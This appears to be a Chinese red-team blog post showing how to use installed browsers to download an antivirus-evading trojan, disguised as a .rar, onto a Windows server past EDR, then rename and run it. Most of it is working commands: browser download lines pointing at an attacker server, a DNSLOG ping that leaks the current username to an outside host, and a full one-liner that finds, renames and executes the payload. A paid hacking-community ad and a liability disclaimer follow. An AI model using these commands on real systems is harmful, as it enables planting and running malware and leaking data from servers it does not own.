又一个 Windows 远程下载方法 | 红队攻防

对于很多攻击测试人员来说,只要让我把程序上传到服务器,让我执行,我就能给你一切

我们希望把这个事情再向前推进一步,只要能执行命令,就能给你一切

对于 Linux 来说,这几乎没有难度,对于 Windows 来说,挺难受的,因为这些 EDR 软件会不竭余力地对我们远程下载进行阻拦,今天我再介绍一种简单的方法

向服务器上传木马这种事从本质上来说就是向服务器提交一些数据,之后服务器按照我们想要的方式进行存储。

我不知道为啥大家做这种事情最先用的是 certutilpowershellvbsBitsadmin等,不应该是浏览器吗?

带着这个疑问,有了这篇文章

0x01 前提条件

前提条件

  • 服务器出网

  • 服务器安装了其他浏览器

    • firefox

    • chrome

    • edge

0x02 利用方法

首先,将我们的免杀木马后缀改为 rar ,当然,还有大量的后缀可以使用,需要注意的是,这种后缀的文件必须是直接下载,而不是在浏览器中打开,所以 .jpg 这种就别用了

firefox

start firefox http://192.168.1.1:19900/demo.rar

chrome

start chrome http://192.168.1.1:19900/demo.rar

edge

start msedge http://192.168.1.1:19900/demo.rar

0x03 实验测试

EDR: 360 安全卫士 + 360 杀毒

系统:Windows Server 2012

控制端:metasploit


为了更加真实地模拟远程命令执行环境,这里用 msf 的 shell 来模拟,使用 360 作为 EDR

模拟控制环境

图片

配置木马下载服务器

我们使用 everything.exe 来模拟免杀木马

图片

命令行中执行下载指令

以 firefox 为例

图片

图片

图片

重命名我们远程下载的文件,重命名为 .exe 文件并执行

图片

成功执行我们的“免杀木马”

chrome

图片

图片

edge

图片

图片

0x04 无回显如何执行

从上面实验环境来看没啥困难,但是在实际工作工程中,很多时候我们无法获取到回显,也就是说我们需要把整套命令建立在完全没有任何回显的条件下进行

一般来说,浏览器会自动下载到

C:\Users\username\Downloads  这个目录下, username 是当前用户名称

图片

但是,如果没有回显,我们无法直接执行 whoami 获取用户名,所以要找到我们下载的文件,主要有两种方案

通过 DNSLOG 获取用户名,拼接得到路径

ping %USERNAME%.flag.9e56ka.dnslog.cn

图片

图片

这样,我们获取到当前用户名为 helper ,之后我们拼接处路径为 C:\Users\helper\Downloads

但是这种方法有盲点对吧,因为可能目标把下载默认位置给改了,这样我们就扑了个空

通过文件遍历找到文件位置

既然我们能控制文件的名字,那我们可以使用一个比较有代表性的名字,这里以 NNNNnop.rar 为例

图片

远程下载;确定文件路径;重命名;执行

start msedge http://192.168.1.1:19900/NNNNnop.rar && ping -n 10 127.0.0.1 >NUL && for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "NNNNnop.rar""') do set kk=%k && (set dd=%kk:NNNNnop.rar=123456.exe%) && rename %k 123456.exe && ping -n 10 127.0.0.1 >NUL && cmd /c %dd%

这个命令挺复杂的,我按照步骤来简单说一下

  • 使用 edge 浏览器远程下载

    start msedge http://192.168.1.1:19900/NNNNnop.rar

  • 延时 10 s

    ping -n 10 127.0.0.1 >NUL

  • 遍历所有盘符,寻找 NNNNnop.rar 这个文件

    cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "NNNNnop.rar""

    NNNNnop.rar 是我们远程下载的文件名,这个文件名一定要唯一,不然后续的命令会把系统同名文件给重命名并且执行了,会影响系统

  • 重命名 NNNNnop.rar 为 123456.exe ,路径还是在下载路径

    for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "NNNNnop.rar""') do set kk=%k && (set dd=%kk:NNNNnop.rar=123456.exe%) && rename %k 123456.exe

  • 延时 10 s

    ping -n 10 127.0.0.1 >NUL

  • 执行我们的木马

    cmd /c %dd%

图片

图片

成功执行了我们的“免杀木马

 圈子的最近主题和圈子内部工具一些展示

poc漏洞库 8000+src陆续更新中 -紧跟时代发展争做先进网安人

图片

一起愉快刷分-榜上有名

图片

免杀-护网必备

图片

新手学习、老手巩固-温故而知新

图片

学习报告-三人行必有我师

图片

各类会员-尊贵的SVIP

图片

图片

图片

 

「你即将失去如下所有学习变强机会」

学习效率低,学不到实战内容,几千上万深造没有性价比

一顿自助钱,我承诺一定让用户满意,也希望用户能给予我一份信任

【详情下方图片了解】,【扫下方二维码加入】:只做高质量优质精品内容」

圈子目前价格为¥99元(交个朋友啦!),现在星球有近150+位师傅相信并选择加入我们,圈子每天都会更新内容,老用户可永久享受初始加入价格,圈子内容持续更新中

一张图总结

图片

图片

免责声明

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吉吉说安全

感谢打赏,交个朋友!有困难找我

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值